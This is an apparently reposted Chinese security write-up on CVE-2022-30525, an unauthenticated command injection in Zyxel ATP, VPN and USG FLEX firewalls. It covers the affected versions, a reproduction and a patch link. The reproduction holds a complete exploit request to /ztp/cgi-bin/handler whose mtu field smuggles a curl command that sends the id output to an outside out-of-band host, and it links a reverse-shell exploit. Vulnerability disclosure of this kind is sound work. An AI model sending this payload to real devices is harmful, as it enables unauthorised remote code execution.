CVE-2022-30525:Zyxel防火墙未授权远程命令执行漏洞

admin 2025年1月11日13:56:35评论17 views字数 1344阅读4分28秒阅读模式
上方蓝色字体关注我们,一起学安全!
作者:韭菜@Timeline Sec
本文字数:672
阅读时长:2~3min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
0x01 简介
Zyxel VPN防火墙系列提供了一个完整的功能集,可完全符合不同的业务需求,并通过一对一的设备实现最高性能和安全性。; 全面的网络模块化还使IT专业人员能够定制系统以满足其个人需求。
0x02 漏洞概述

漏洞编号:CVE-2022-30525

Rapid7 发现并报告了一个漏洞,该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。

0x03 影响版本
USG FLEX 100、100W、200、500、700 < ZLD5.00 - ZLD5.21 USG20-VPNUSG20-VPNUSG20W-VPN < ZLD5.10 - ZLD5.21 ATP 100、200、500、700、800 < ZLD5.10 - ZLD5.21
0x04 漏洞复现

以USG20 -VPN为例

CVE-2022-30525:Zyxel防火墙未授权远程命令执行漏洞

攻击是通过/ztp/cgi-bin/handler端点发起的,通过mtu参数进行命令执行

CVE-2022-30525:Zyxel防火墙未授权远程命令执行漏洞

POST /ztp/cgi-bin/handler HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Connection: closeContent-Type: application/jsonAccept-Encoding: gzip{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl `id`.cbc2oelmk1u41mao0f10zeoez9n56xp8c.oast.live;","data":"hi"}
0x05 修复方式

当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。

链接如下:

https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml

参考链接/相关工具:

https://github.com/Chocapikk/CVE-2022-30525-Reverse-Shell

https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-30525.yaml

CVE-2022-30525:Zyxel防火墙未授权远程命令执行漏洞
CVE-2022-30525:Zyxel防火墙未授权远程命令执行漏洞
阅读原文看更多复现文章
Timeline Sec 团队
安全路上,与你并肩前行

原文始发于微信公众号(Timeline Sec):CVE-2022-30525:Zyxel防火墙未授权远程命令执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月11日13:56:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-30525:Zyxel防火墙未授权远程命令执行漏洞https://cn-sec.com/archives/1190469.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息